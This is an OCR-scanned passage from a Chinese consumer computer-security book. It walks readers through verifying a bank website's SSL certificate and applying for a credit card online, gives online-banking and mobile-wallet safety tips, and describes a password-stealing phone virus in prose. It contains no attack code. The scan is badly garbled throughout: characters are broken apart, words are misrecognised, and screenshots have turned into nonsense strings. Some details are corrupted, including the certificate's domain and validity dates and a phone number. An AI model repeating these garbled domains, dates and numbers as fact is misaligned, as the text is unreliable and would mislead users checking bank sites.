的 过 程 ， 进 而 判断 自己 打开 的 工行 网 站 的 
真 伪 ， 具 体 的 操作 步骤 如 下 。 

[sep 园 在 IE 浏览 器 地 址 栏 中 输入 工商 银行 的 
网 址 http:Wwww.icbc.com.cn 打 开 该 银行 系统 
的 首页 ， 在 该 界面 的 左 侧 单 击 网 上 银行 任 
意 服务 项 目 按钮 ， 即 可 打开 该 服务 项 目的 
账号 密码 登录 界面 ， 如 单 击 “个 人 网 上 银 
行 登录 ”按钮 ， 即 可 打开 个 人 网 上 银行 登 
录 窗 口 。 


在 该 登录 界面 地 址 栏 后 面 可 看 到 一 
个 又 图 标 按钮 ， 单 击 该 按钮 即 可 弹出 一 个 
“网 站 标识 ”信息 提示 界面 ， 提 示 用 户 本 
次 与 服务 器 的 连接 是 加 密 的 。 


时 池 网 站 标识 
Verisign 已 将 此 站 点 标识 为 

Industrial and Commercial Bank of China 
Limited 

Beijing, Beijing 

CN 

与 该 服务 器 的 这 次 连接 是 加 密 的 . 

我 应 该 信任 该 站 点 吗 ? 


查看 证 书 


step 图 单 去 “查看 证 书 ” 连 接 按钮 ， 打 开 


“证 书 ” 对 话 框 ， 在 “常规 ”选项 卡 中 可 
查看 该 证 书 的 目的 、 颁 发 给 、 颁 发 者 和 有 
效 起 始 日 期 等 信息 。 


“有关 详细 信息 ， 请 参考 证 蔬 硕 发 机 构 的 竞 明 , 


颁发 给 : mybarkiicbc.com.n 


里 发 者 : Symantec Class 3 5V SSL CA - 63 


有 效 戎 从 2016-10-19 到 201801-01 


单 击 “ 安 装 证 书 ” 按 钮 ， 打 开 “ 欢 迎 
使 用 证 书 导入 向 导 ” 对 话 框 。 该 向 导 将 帮 
助 网 银 用 户 把 证 书 、 证 书信 任 列表 和 证 书 
吊销 列表 从 磁盘 中 复制 到 证 书 存 储 区 中 。 
欢迎 使 用 证 书 导入 向 号 


和 
ER 


et 
CE 


Os 


$e TR 


CJ]| = 


[Estee 图 单 去 “下 一 步 ” 按 钮 ， 打 开 “ 证 书 
存储 ”对 话 框 ， 其 中 证 书 存储 区 是 保存 
证 书 的 系统 区 域 ， 用 户 可 根据 实际 需要 
自动 选择 证 书 存 储 区 ， 一 般 采 用 系统 默 
认 选 项 “根据 证 书 类 型 ， 自 动 选择 证 书 
存储 ”。 
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[em ] ws 
[Sep 图 选择 完毕 后 ， 单 击 “ 下 一 步 ” 按 钮 ， 
即 可 打开 “正在 完成 证 书 导 入 向 导 ” 对 话 
框 ， 并 提示 用 户 已 成 功 完成 证 书 的 导入 。 


x 


SF ersAns 
正在 完成 证 书 导入 向 导 
Pe RES 


Fem The 


Ee rem 
-wk 


[en] 


step 园 单 击 “ 完 成 ”按钮 打开“ 导入 成 
功 ” 对 话 框 ， 至 此 ， 就 完成 了 中 国 工商 银 
行 网 上 银行 安全 证 书 的 安装 操作 。 


证 书 导 入 向 导 x 


(i 号 入 成 功 . 


[step 图 切换 到 “详细 信息 ”选项 卡 ， 即 可 
在 该 界面 中 根据 实际 需要 查看 证 书 的 相关 
信息 ， 如 证 书 的 版 本 、 序 列 号 、 主 题 、 公 
钥 、 算 法 、 证 书 策略 等 。 
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ES x 


办 站 “让 世相 攻 


B57 
3 吕 
国生 a 
国 元 此 型 由 叶 153d25 并 和 
a ha256RSA 
ess she256 
Eb Symantec Class 3 EV SSL -. 
El 2016410819EW= 9 
国 - 2018 手 181 时 山 一 7:59:59 


mybenkizbc.comen, Sofi-. 


[step 图 声 找 到 “证 书 路 径 ” 选 项 卡 ， 即 可 在 
该 界面 中 查看 证 书 的 相关 路 径 信息 。 


证 x 


易 疯 。 济 遇 下 号 证 蔬 品 茎 
十 才 4 人 P) 
Verision 
a Symantec Closs 3EV SSLCA -G3 
| 
局 


HGSh， 
[ET 


[| 


移 提 示 : 在 网 银 安 全 证 书 安装 完毕 后 ， 就 
可 以 使 用 该 证 书 来 保护 自己 的 网 银 账 号 安 
全 了 ， 注 意 在 查看 网 银 证 书信 息 时 ， 一 定 要 
注意 网 银 证 书 上 的 信息 是 否 正确 及 证 书 是 否 
在 有 效 期 内 ， 如 果 证 书 显示 的 信息 不 一 致 或 
不 在 有 效 期 内 ， 那 么 这 个 网 上 银行 系统 就 有 
可 能 是 黑客 伪造 的 钓鱼 网 站 。 
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交易 ， 以 享受 随时 随地 理财 的 方便 ， 但 是 
在 用 户 使 用 网 上 银行 服务 之 前 ， 还 需要 提 
高 网 上 银行 安全 防范 意识 ， 确 保 网 上 银行 
交易 的 安全 。 

在 使 用 的 过 程 中 用 户 需要 注意 以 下 
事项 。 
(1) 不 要 随便 开启 来 历 不 明 并 附带 
有 附件 的 电子 邮件 ， 以 免 自己 的 计算 机 中 
毒 ， 并 且 不 要 单 击 邮 件 中 的 可 疑 超级 链 
接 ， 尤 其 是 中 奖 类 型 的 链接 。 

(2) 在 下 载 安 全 网 上 银行 安全 控件 
时 ， 一 定 要 在 网 上 银行 系统 中 进行 下 载 ， 
不 要 到 不 明 网 站 中 下 载 。 

(3) 保护 好 自己 的 身份 证 号 、 手 机 
号 、 账 号 及 密码 等 个 人 信息 ， 不 要 在 不 熟 
悉 的 网 站 上 输入 ， 不 要 随意 泄露 给 他 人 。 

(4) 如 果 必 须 提供 自己 的 隐私 信息 ， 
需要 查看 当前 网 站 的 隐私 政策 说 明 及 安全 
防护 措施 说 明 。 

(5) 定期 更 换 自己 的 网 上 银行 密码 。 

(6) 避免 误 入 假冒 网 站 。 建 议 访问 网 
上 银行 时 ， 直 接 输入 网 址 登录 ， 或 将 经 常 
用 到 的 银行 网 站 地 址 添加 到 浏览 器 的 “ 收 
藏 来” 中， 切记 不 要 采用 超级 链接 方式 间 
接 访问 网 上 银行 网 站 ， 如 通过 电子 邮件 及 
即时 通信 工具 对 话 信息 中 的 网 页 链接 登录 
银行 。 

(7) 不 要 登录 来 历 不 明 的 网 站 并 留意 
地 址 栏 的 域名 变化 。 

(8) 仔细 核对 网 上 支付 交易 信息 。 在 
交易 支付 时 仔细 核对 商户 名 称 和 订单 号 ， 
确保 无 误 后 再 支付 。 

(9) 妥善 保管 好 网 银 盾 、 动 态 口令 卡 
等 安全 产品 ， 不 要 随意 交 给 他 人 使 用 ， 完 
成 交易 后 要 及 时 拔 出 网 银 盾 。 

(10) 切 勿 使 用 公用 计算 机 登录 网 上 银 


14.3.4 ”使 用 过 程 中 的 安全 
现在 很 多 人 都 喜欢 使 用 网 上 银行 进行 
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行 的 网 站 。 

(11) 定期 查阅 网 上 银行 户口 余额 及 交 
易 记 录 ， 如 果 发 现任 何 错漏 或 未 经 授权 的 
交易 ， 请 立即 通知 相关 银行 。 


14.4 ”实战 演练 


实战 演练 1 一 一 如 何 网 上 申请 信用 卡 


除了 去 银行 的 营业 厅 申 请 信用 卡 外 ， 
也 可 以 到 网 上 申请 ， 由 于 可 在 网 上 申请 开 
通信 用 卡 的 银行 很 多 ， 开 通 的 方式 又 大 同 


小 异 ， 所 以 下 面 就 以 一 家 银行 为 例 ， 来 介 
绍 网 上 申请 信用 卡 的 操作 步 又。 

[Estee 国 在 银行 的 网 站 中 ， 找 到 信用 卡 申 请 服 
务 功 能 模块 。 


信用 卡 在 线 申请 》 
申请 进度 查 词 > 


在 线 开 卡 》 
> ”账单 积分 吾 记 > 

“信用 卡 积分 名 按 》 
BF > 


单 击 “信用 卡 在 线 申 请 ” 超 链接 ， 进 
入 “信用 卡 申请 ”界面 ， 在 其 中 输入 界面 
提示 的 相关 信息 。 


信用 卡 中 请 


| 

机 的 上 和 是 。 [而 他 已 

hor shactercarets v 

ere 
Me 
了 产品 洋 俩 
多 是 天 人 人 有 +。 是 而 三 

罗 是 再 持 及 也 行 同根 天 《 神 清和 站 ) 是 四 至 (RR， 可 地 特 便 到 村 只 : ) 


者 二 办 妥 主 上 


[ep 图 单 去 “下 一 步 ” 按 钮 ， 打 开 “ 信 用 卡 
申请 ”协议 界面 ， 勾 选 下 方 的 复 选 框 ， 表 
示 愿 意 遵守 相关 协议 。 


信用 卡 申 请 


重 了 提示 : ~ 
二 主 上 中 请 人 基态 弟 补 力 年 畦 介 于 3 10 周 岩 ， 具 有 完全 民事 行为 卫 力 的 中 加 公民 /人 金 末 人 
习 区 ) ， 外 国 公民 。 附属 卡 曲 拟人 清 年 油 13 局 风 。 

请 了 本 申请 并 人 主 上 ”加 属 上 让 请 全 证 六 人 件 过 内 人 士民 民生 


于 证 ; 迪 
年 度 年 在。 如 刘 信 用 卡 外 关 问 于 ， 请 条 rr cch coz 直 扰 箱 24 NE 震 户 于 引 100-820-053 


A 人 


Step 加 单 去 “下 一 步 ” 按 钮 ， 进 入 “基本 资 
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料 ” 填 写 界面 ， 在 其 中 根据 提示 输入 基本 


BE 图 单 二 “下 一 步 ” 按钮 ， 打 开 “ 工 作 次 
料 ”界面 ， 在 其 中 输入 工作 资料 信息 。 


Po 9) 9 


orn 


[Eeeg 单 击 “ 下 一 步 ” 按 钮 ， 进 入 “对 账单 
地 址 ”界面 ， 在 其 中 根据 提示 输入 对 账单 
的 相关 地 址 。 


[step 国 单 击 “下 一 步 ” 按 钮 ， 打开“ 其 他 
资料 ”界面 ， 在 其 中 根据 提示 输入 其 他 
资料 。 


HH 


A 


mm 7 
A AR 


i 
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step 园 单 击 “ 下 一 步 ” 按 钮 打开“ 您 的 申 
请 ”界面 ， 在 其 中 可 以 查看 自己 的 基本 资 
补 ， 并 输入 手机 的 验证 码 。 


qT HAG EelneiES 


和 


单 击 “确认 提交 申请 ”按钮 ， 即 可 完 
成 信用 卡 的 网 上 申请 操作 。 

侈 提示 :信用 卡 申 请 后 ， 银 行 会 通过 客 
服 联系 用 户 ， 一 般 有 两 种 情况 : 银行 要 求 用 
户 带 上 相关 证 件 去 营业 厅 办 理 ， 或 者 银行 工 
作 人 员 上 门 帮 用 户 办理 。 只 要 身份 等 核实 正 
确 ， 用 户 符 合 开 通信 用 卡 的 条 件 ， 那 么 用 户 
的 网 上 申请 信用 卡 就 算是 真 的 成 功 了 。 


实战 演练 2 一 一 使 用 网 银 进行 网 上 购物 


网 上 购物 ， 就 是 通过 互联 网 检索 商品 
信息 ， 并 通过 电子 订购 单 发 出 购物 请 求 ， 
然后 进行 网 上 支付 ， 厂 商 通 过 邮购 的 方式 
发 货 ， 或 是 通过 快递 公司 送 货 上 门 。 这 里 
以 在 淘宝 上 购物 为 例 ， 介 绍 使 用 网 上 银行 
进行 购物 的 方法 。 

要 想 在 淘宝 网 上 购买 商品 ， 首 先 要 注 

一 个 账号 ， 才 可 以 以 淘宝 会 员 的 身份 在 
其 网 站 上 进行 购物 。 下 面 介绍 如 何在 淘宝 
网 上 注册 会 员 并 购买 物品 。 


1. 注册 淘宝 会 员 


step 图 启动 Microsoft Edge 浏 览 器 ， 在 地 址 
栏 中 输入 http://www.taobao.com， 打 开 淘 宝 
网 首页 。 
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< 光宇 名 归 务 5 天 涝 ， 习 这 外 市 闷 条 | Fe 内 4 二 沿 司 抽风 区 


EE 


DA 
GS es am nae 
EB ss 


克 回 单 击 界面 左上 角 的 pe 按 
钮 打开 “注册 协议 ”工作 界面 。 


E17 = 


1 


《了 冯 协议 》 
《二 芥 疡 明 隐 也 避 攻 策 》 
《 支 宝 职务 协议 》 


step 图 单 直 “同意 协议 ”按钮 ， 打 开 “ 设 置 
用 户 名 ”界面 ， 在 其 中 可 以 输入 自己 的 手 
机 号 码 进行 注册 。 


人 @iRERPS 下 册 成 册 


Hs HEA ?65 ER 


Step 图 单 去“ 下 一 步 ” 按 钮 ， 打 开 “ 验 证 手 
机 ”界面 ， 在 其 中 输入 淘宝 网 发 给 手机 的 
验证 码 。 


[ep 图 单 击 “确认 ”按钮 ， 打 开 “ 填 写 账户 
信息 ”界面 ， 在 其 中 输入 相关 的 账户 信息 。 


设置 登录 密码 。 登录 时 验证 ,保护 账号 信息 


Ro.. 强度: 宁 
E> eeee| u 
设置 会 员 名 
登录 训 | 筷 足 你 的 论 E 0 
18 字 符 


单 击 “ 提 交 ” 按 钮 ， 打 开 “ 用 户 注 
册 ” 界 面 ， 在 其 中 提示 用 户 注册 功能 。 


用 户 注册 


口 ” 替 喜 注册 成 功 ， 你 的 账户 为 


的 中 三 请 用 于 支付 十 天竺 ， 一 击 、 和 对唱 齐 ， 坟 竹 


step 园 单 击 “和 登录” 按钮， 打开 淘宝 网 用 户 
登录 界面 ， 在 其 中 输入 淘宝 网 的 账号 与 登 


账户 密码 登录 
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step 图 单 击 “登录 ”按钮 ， 即 可 以 会 员 的 身 
份 登录 淘宝 网 上 ， 这 时 可 以 在 淘宝 网 首页 
的 左上 角 显 示 登 录 的 会 员 名 。 


2. 在 淘宝 网 上 购买 商品 


[Eee 国 在 淘宝 网 的 首页 搜索 文本 框 中 输入 自 
己 想 要 购买 的 商品 名 称 ， 如 这 里 想 要 购买 
一 个 手机 壳 ， 就 可 以 输入 “手机 过 ”。 


DN + | 
< oO tear 让 | 三 WO 
mm = 3 Hom ~ WN mr 
天 
Fm 


[step 图 单 去 “搜索 ”按钮 ， 弹 出 搜索 结果 界 
面 ， 选 择 喜欢 的 商品 。 


EE + 
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[Ep 国 单 去 其 图 片 ， 弹 出 商品 的 详细 信息 界 
面 ， 在 “颜色 分 类 ”中 选择 商品 的 颜色 分 
类 ， 并 输入 购买 的 数量 。 


和 和 


| oa es 
= 
| 回国 | EL 


”5 + FE 


碍 及 名 下 恒 ”” EDC 
诸 出 本 家 由 01 人气 ok ™ mn 国 


step 园 单 二 “立刻 购买 ”按钮 ， 弹 出 发 货 详 
细 信 息 界 面 ， 设 置 收 货 人 的 详细 信息 和 运 
货 方 式 ， 单 击 “ 提 交 订 单 ” 按 钮 。 


牛角 宝贝 单价 (元 数 区 hi (元; 


霖 着 下: 


[Estee 图 弹出 支付 宝 我 的 收银 台 窗口 ， 在 其 中 
输入 支付 宝 的 支付 密码 。 


个 网 上 购物 操作 ， 并 在 打开 的 界面 中 显示 
付款 成 功 的 相关 信息 ， 下 面 只 需要 等 待 快 
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递送 货 即 可 。 


© gem 


“人 阁 主 炳 关 21.16 和 

1 月 12 昌 至 :18 日 付 孝 的 天 多 

清查 看 双 12 环 问 才 类 时 
加 加 


放生 
日 2 生前 改革 ， 壮 请 这 般 。 天 独 国 i、 定制 、 预 村 及 特 中 


加以” 王 看 已 天 到 护 宝 贝 。 直 看 文 易 尘 时 


i] 
年 ， 课 听 如 导电 志 证 注 ! 
过 必 移 槐 。 去 全 无 忧 , 限 和 卫生 100W 志 付 宝 际 户 雪 全 险 


14.5 ”小 试 身 手 
练习 1: 设置 手机 短信 认证 的 最 低 限额 

用 户 可 以 登录 网 上 银行 自行 设置 手机 短 
信 认 证 最 低 限额 ， 具 体 的 开通 流程 如 下 。 

(1) 如 果 在 柜 面 注册 网 上 银行 时 已 
经 预 留 了 手机 号 码 ， 用 户 可 以 登录 网 上 银 
行 ， 选 择 “ 安 全 中 心 ”栏目 下 的 手机 短信 
认证 自助 开通 该 功能 。 

(2) 如 果 在 柜 面 注册 网 上 银行 时 没有 
预 留 手机 号 码 ， 用 户 可 以 携带 有 效 身份 证 
件 到 工行 营业 网 点 申请 开通 手机 短信 认 
证 服务 。 

设置 后 ， 用 户 今后 的 支付 类 交易 高 于 
该 限额 才 需 短信 验证 ， 低 于 该 限额 的 交易 
可 直接 用 U 盾 或 口令 卡 完成 交易 。 为 保障 客 
户 资金 安全 ， 设 置 手机 短信 认证 最 低 限额 
需要 进行 短信 认证 ， 并 使 用 U 盾 或 口令 卡 验 
证 客户 身份 。 
练习 2: 开通 银行 账户 余额 变动 提醒 

开通 银行 账户 余额 变动 提醒 可 以 及 时 
掌握 账户 资金 变动 、 获 取 银 行 金融 信息 。 
这 里 以 工商 银行 为 例 ， 来 介绍 开通 银行 账 
户 余额 变动 提醒 的 方法 。 

工商 银行 的 工 银 信使 是 以 手机 短信 或 
电子 邮件 等 方式 向 客户 指定 的 手机 号 码 或 
电子 邮箱 发 送 电子 信息 的 业务 。 用 户 可 通 
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过 工行 个 人 网 上 银行 、 个 人 电话 银行 、 个 人 手机 银行 和 短信 银行 等 多 种 渠道 签订 工 银 信 使 
服务 协议 ， 定 制 工 银 信使 服务 。 
使 用 手机 银行 开通 工 银 信使 的 操作 流程 如 下 图 所 示 。 


选择 “定制 工 银 信使 ” 


进入 主 菜单 ， 
选择 工 根 信使 


选择 “我 的 工 银 信使 ” 
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随 着 科技 迅猛 发 展 ， 移 动 终端 也 在 不 断 突破 和 变革 。 起 初 ， 手 机 还 只 是 打 电 话 、 发 短 
信 的 联系 工具 ; 如 今 ， 随 着 娱乐 功能 和 移动 银行 等 各 类 服务 的 加 入 ， 人 们 越 来 越 离 不 开 手 
机 ，“ 手 机 钱包 ”也 融入 了 人 们 的 生活 。 本 章 介绍 手机 钱包 的 安全 防护 策略 。 


15.1 手机 钱包 的 攻击 手法 


在 用 户 享受 手机 支付 带 来 的 轻松 方便 
的 同时 ， 如 何 确保 支付 安全 ， 也 成 了 许多 
用 户 的 关注 与 担心 焦点 。 交 易 过 程 中 存在 
的 安全 隐患 ， 将 间接 导致 交易 失败 ， 甚 至 
严重 威胁 到 我 们 的 财产 安全 。 下 面 介绍 手 
机 钱包 的 攻击 手法 。 


Sl] 


手机 窃听 病毒 的 出 现 给 人 们 提 了 个 
醒 ， 开 放 的 手机 系统 平台 为 人 们 带 来 多 种 
精彩 的 同时 ， 还 带 来 了 诸多 风险 与 安全 隐 
患 ， 智 能 手机 的 开放 性 给 恶意 软件 等 安全 
威胁 带 来 可 乘 之 机 。 

手机 支付 时 代 到 来 之 际 ， 各 大 手机 运 
营 商 纷纷 开发 出 手机 支付 客户 端 软件 ， 中 
国 移动 推出 了 综合 性 移动 支付 服务 ， 如 缴 
话费 、 收 付款 、 生 活 缴费 、 订 单 支付 等 ; 
中 国 银联 借助 其 强大 的 金融 渠道 体系 ， 在 
“手机 银行 ”中 实现 了 包括 手机 话费 查询 
及 缴纳 、 银 行 卡 余额 查询 、 航 空 订 票 等 多 


手机 病毒 


种 支付 服务 ; 第 三 方 在 线 支 付 厂商 也 逐步 
把 互联 网 上 的 成 熟 消 费 模式 移植 到 手机 终 
端 上 。 

与 此 同时 ， 病 毒 的 魔爪 也 悄悄 伸 向 人 
们 的 手机 “钱包 ”， 染 上 盗号 病毒 的 手机 
会 将 用 户 的 网 银 、 手 机 炒股 等 重要 密码 ， 
传送 给 不 法 分 子 。2010 年 下 半年 ， 网 秦 全 
球 手 机 安全 中 心 就 截获 了 一 个 名 为 “终极 
密 盗 ”的 高 危 盗 号 类 手机 病毒 。 该 手机 病 
毒 通过 伪装 成 塞 班 手机 系统 的 “系统 升级 
包 ” 骗 取 用 户 下 载 安装 。 感 染 手机 后 ， 在 
用 户 登 录 手 机 QQ、 网 银 及 手机 炒股 软件 时 
窃取 用 户 密 码 ， 并 通过 短信 形式 发 送 到 其 
指定 号 码 实 现 盗 号 。 据 介绍 ， 此 类 手机 盗 
号 病毒 具备 极 强 的 传播 性 ， 伪 装 巧妙 ， 感 
染 用 户 手机 后 ， 自 动 启动 并 在 后 台 运 行 ， 
且 难 以 简单 卸载 清除 。 


15.1.2 ” 盗 取 手机 


由 于 手机 支付 的 支付 账户 和 手机 必须 进 
行 绑 定 ， 手 机 不 慎 丢 失 后 ， 如 果 用 户 未 设置 支 
付 密码 或 验证 过 于 简单 ， 很 容易 被 他 人 利用 ， 
造成 利用 机 主 名 义 完 成 相关 支付 的 严重 后 果 。 


15.2 “手机 钱包 的 防护 策略 


在 了 解 手机 钱包 的 攻击 手法 后 ， 下 面 
介绍 相对 应 的 防护 策略 。 
15.2.1 手机 盗号 病毒 的 防范 


为 避免 手机 用 户 被 不 法 分 子 侵害 ， 专 
家 建议 用 户 应 谨慎 单 击 短信 和 链接、 运行 彩 


信 附 件 ， 并 在 网 络 下 载 和 通过 蓝牙 等 设备 
接收 到 陌生 安装 包 时 ， 及 时 通过 手机 安全 
软件 对 其 进行 安全 检测 。 

由 于 近期 在 中 小 安 卓 软件 商店 、 论 坛 
中 频繁 出 现 伪装 成 正常 手机 软件 ， 在 用 户 
下 载 后 屏蔽 运营 商业 务 短信 并 实施 扣 费 的 
安 卓 恶意 软件 ， 专 家 建议 用 户 在 通过 软件 
商店 下 载 应 用 程序 后 及 时 进行 安全 检测 ， 
阻止 恶意 插件 的 安装 。 同 时 密切 关注 自己 
的 手机 资费 情况 ， 发 现 手 机 话费 存在 异 
常 ， 且 无 法 收 到 正常 的 业务 提示 时 ， 用 户 
应 选择 通过 拨打 运营 商 客 服 电话 等 方式 做 
详细 了 解 ， 或 前 往 营 业 厅 查询 当前 手机 的 
SP 业务 开通 情况 。 

特别 是 针对 盗号 类 手机 病毒 ， 用 户 要 
选择 正规 手机 软件 下 载 网 站 进行 下 载 ， 切 
勿 轻信 “破解 版 ”“ 完 美 修 正版 ”等 经 过 
二 次 打包 的 手机 软件 、 手 机 游戏 、 歌 曲 、 
电子 书 等 ， 谨 防 其 中 埋藏 手机 病毒 。 

如 果 自 己 的 手机 是 智能 手机 ， 这 时 就 
可 以 到 网 上 下 载 针对 自己 手机 型 号 或 系统 
的 杀毒 软件 ， 下 图 为 360 手 机 杀毒 软件 的 下 
载 页 面 。 


[TI me 


全 350#Mn# 


5 
己 巨 口 手机 杀毒 


ey ~ 还 半 h 


上衣 字 种 航 天 室 


15.2.2 手机 丢失 后 手机 钱包 的 防范 


自己 的 手机 一 旦 丢失 ， 为 了 防止 不 法 分 
子 冒 充 自己 使 用 手机 钱包 ， 首 先 立刻 通知 银 
行 取消 此 项 业务 ， 这 样 盗 取 或 捡 到 手机 的 人 
也 会 因为 不 知道 密码 而 无 法 消费 。 如 下 图 所 
示 为 中 国 工商 银行 的 手机 银行 业务 页 面 。 
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Fa 


15.2.3 ”强健 手机 钱包 的 支付 密码 


由 于 用 户 信息 是 通过 无 线 传输 方式 进行 
传输 的 ， 其 加 密 手 段 相对 简单 ， 一 旦 手机 钱 
包 的 支付 密码 被 破解 ， 用 户 的 损失 将 很 难 挽 
回 。 针 对 这 种 情况 ， 就 要 求 用 户 设置 相对 复 
杂 的 密码 。 复 杂 密 码 应 该 符合 以 下 条 件 。 

e 不 要 使 用 可 轻易 获得 的 关于 自己 的 

信息 作为 密码 。 这 包括 执照 号 码 、 
电话 号 码 、 身 份 证 号 码 、 工 作证 号 
码 、 生 日 、 手 机 号 码 、 所 居住 的 街 
道 名 字 等 。 

e 定期 更 换 密码 ， 因 为 8 位 数 以 上 的 字 
母 、 数 字 和 其 他 符号 的 组 合 也 不 是 
绝对 不 可 破解 的 ， 但 更 换 密码 前 请 
确保 所 使 用 电脑 的 安全 。 

e 不 要 把 密码 轻易 告诉 任何 人 。 尽 可 

能 避免 因为 对 方 是 网 友 或 现实 生活 
中 的 朋友 ， 而 把 密码 告诉 他 。 

e 避免 多 个 资源 共用 一 个 密码 ， 一 旦 一 个 

密码 泄露 ， 所 有 的 资源 都 受到 威胁 。 

e@ 不 要 让 Windows 操 作 系 统 或 者 IE 浏 

览 器 保存 你 任何 形式 的 密码 ， 因 为 
“*” 符 号 掩盖 不 了 真实 的 密码 ， 而 
且 在 这 种 情况 下 ，Windows 操 作 系 
统 都 会 将 密码 以 简单 的 加 密 算法 存 
储 在 某 个 文件 中 。 

e 不 要 随意 放置 你 的 账号 密码 ， 注 意 
把 账号 密码 存放 在 相对 安全 的 位 
置 。 密 码 写 在 台历 上 、 记 在 钱包 
上 、 写 入 PDA 等 都 是 危险 的 做 法 。 


黑客 攻防 与 电脑 安全 从 新 手 到 高 手 〈 微 视频 + 火力 升级 版 ) 


。 申请 密码 保护 ， 也 即 去 设置 安全 
码 ， 安 全 码 不 要 和 密码 设置 的 一 
样 。 如 果 没 有 设置 安全 码 ， 别 人 一 
且 破 解密 码 ， 就 可 以 把 密码 和 注册 
资料 〈 除 证 件 号 码 ) 全 部 修改 。 
e 不 使 用 简单 危险 密码 ， 推 荐 将 密码 
设置 为 8 位 以 上 的 大 小 写字 母 、 数 字 
和 其 他 符号 的 组 合 。 
昌 15.2.4 ” 微 信 手 机 钱包 的 安全 设置 
微 信 支付 已 经 是 当前 流行 的 支付 方式 
了 ， 因 此 ， 对 微 信 手 机 钱包 的 安全 设置 非 
常 重要 ， 安 全 设置 的 具体 操作 步骤 如 下 。 
“我 的 钱包 ”界面 。 


已 a 
| 
9 
[ao Do | 
[step 图 点 按 右 上 和 角 的 惠 图 标 ， 进 入 “支付 中 


心 ” 界面 。 


账单 


支付 管理 
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step 图 点 按 “ 支 付 安全 ”选项 ， 进 入 “支付 


安全 ”界面 ， 在 其 中 可 以 选择 更 多 的 安全 
设置 。 


QO 人 SD 1831 


(seam 


日 对 虹 
支付 环境 保镖 
尽 
钱包 镇 
6 


百 万 保障 


step 国 点 按 “ 数 字 证 书 ” 选 项 ， 进 入 “数字 
证 书 ” 界 面 ， 提 示 用 户 未 启用 数字 证 书 。 


EEE 0 全 183 


《 ”数字 证 书 


未 启用 数字 证 书 


启用 数字 证 书 可 以 


step 图 点 按 “ 启 用 ”按钮 ， 进 入 “启用 数字 
证 书 ” 界 面 ， 在 其 中 输入 身份 证 号 。 


身份 证 EPE6GPEA 
验证 
1 2 3 
4 5 6 
wh 8 加 
X 0 


点 按 “ 验 证 ”按钮 ， 即 可 开始 验证 身 
份 证 信息 ， 验 证 完成 后 ， 会 给 出 相应 的 提 
示 信 息 。 


数字 证 书 启用 成 功 


Eee 国 返回 到 “支付 安全 ”界面 ， 在 其 中 可 
以 看 到 数字 证 书 已 经 启用 ， 使 用 同样 的 方 
法 还 可 以 启动 钱包 锁 功能 。 
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中 国电 信和 目 日 日 总 


返回 


(samrwaapms 


MSD 18.32 


支付 环境 保镖 


日 
9 
站 和 
癌 


15.3 ”实战 演练 


实战 演练 1 一 一 手机 钱包 如 何 开通 


中 国 移动 手机 客户 无 须 换 手 机 和 号 
码 ， 本 人 携带 有 效 身份 证 件 和 手机 ， 到 指 
定 的 中 国 移动 营业 厅 将 原 SIM 卡 更 换 为 新 型 
RFID SIM 卡 ， 完 成 交易 距离 校准 ， 即 可 开 
通 手机 支付 、 手 机 钱包 功能 。 


实战 演练 2 一 一 手机 钱包 如 何 充值 


在 开通 手机 钱包 时 ， 中 国 移动 将 为 
您 开通 手机 支付 账户 ， 可 以 通过 网 站 
http://www.cmpay.com 实 现 网 上 银行 转 
账 ， 或 者 到 移动 营业 厅 将 资金 充 到 手机 
支付 账户 。 如 果 手 机 钱包 账户 余额 不 
够 ， 可 以 通过 手机 菜单 远程 操作 ， 或 者 
在 移动 营业 厅 ， 将 资金 从 手机 支付 账户 
转 至 手机 钱包 账户 ， 移 动 话费 不 能 为 手 
机 钱包 充值 。 
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15.4 小 试 身手 [step 图 点 按 “ 转 账 ” 按 钮 ， 进 入 “请 输入 
支付 密码 ”界面 ， 在 其 中 需要 输入 支付 
a 练习 1: 使 用 微 信 手机 钱包 转账 密码 。 


使 用 手机 钱包 转账 是 比较 流行 的 支付 
方式 ， 下 面 介 绍 使 用 手机 钱包 转账 的 具体 第 请 输入 支付 密码 
操作 步骤 。 | WW 
[See 国 登录 微 信 ， 点 按 需要 给 予 转 账 的 用 *100.00 
户 ， 进 入 微 信 聊天 界面 ， 点 按 右 侧 的 (中 图 [DA 


标 ， 进 入 如 下 图 所 示 的 界面 。 


中 国 EF 


《 明天, 你 好 ! 


| 2 3 

4 5 6 

7 8 9 
) 品 (十 0 


四 
加 
L 
© 


step 园 输入 密码 正确 后 ， 会 弹出 支付 成 功 


面 与 让 界面 。 
oo HO 全 18: 
| “<4 0 D | 
[step 图 点 按 “ 和 转账” 图标， 进入 “转账 ” 界 2 
面 ， 在 其 中 输入 转账 金额 ， 这 里 输入 100。 
2 l 待 明天 ， 你 好 ! 确认 收 钱 
转账 金 前 ¥ 100.00 
¥100 
转账 
完成 
1 pA 3 
8 9 [Se 图 点 按 “ 完 成 ”按钮 ， 即 可 将 红包 发 送 
0 给 对 方 ， 并 显示 发 送 的 金额 。 


264 


第 15 章 手机 钱包 的 安全 防护 策略 ES 


( = AD) 上 上 
[step 较 当 对 方 收 钱 后 ， 会 给 自己 返回 一 个 对 
方 已 收 钱 的 信息 提示 。 点 按 “ 钱 包 ” 选 项 ， 进 入 “钱包 ” 设 


置 界 面 ， 可 以 看 到 当前 钱包 中 的 零钱 及 服 
务 项 目 。 


《 了 明 天， 你 好 ! 


巴 日 O 
信用 卡 还 款 手机 充值 理财 通 
© GG 
生活 缴费 9 币 充 值 城市 服务 
四 DO 而 全 
练习 2: 使 用 手机 钱包 给 手机 充值 i 
使 用 手机 钱包 可 以 给 手机 充值 ， 具 体 J : 
的 操作 步骤 如 下 。 [step 图 点 按 “ 手 机 充值 ”选项 ， 进 入 “手机 


EGG 国 在 手机 微 信 中 进入 “我 ”界面 ， 在 其 充值 ”界面 ， 在 其 中 输入 手机 号 码 。 
中 可 以 看 到 “钱包 ”选项 。 
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4 
| ® 
(7 广电 信 ) 
30 元 50 元 100 元 
N29 Mag 9 mrtees 
eg | 了 
200 元 300 元 500 元 
于 更 多 流量 
全 作 20.00| TY 
手机 营业 厅 ， 介 手机 换钱 | 话费 送 好 友 | 更 多 服务 


[see 国 点 按 需要 充值 的 金额 ， 如 这 里 点 按 50 
元 ， 会 弹出 “支付 ”界面 ， 点 按 “ 确 认 支 
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付 ” 按 钮 ， 即 可 完成 用 手机 钱包 给 手机 充 


第 16 音 ”无线 监 牙 设备 的 
安全 防护 策略 
蓝牙 是 大 家 经 常 使 用 的 一 种 工具 ， 手 机 之 间 的 文件 互 传 、 手 机 和 电脑 之 间 的 文件 传 


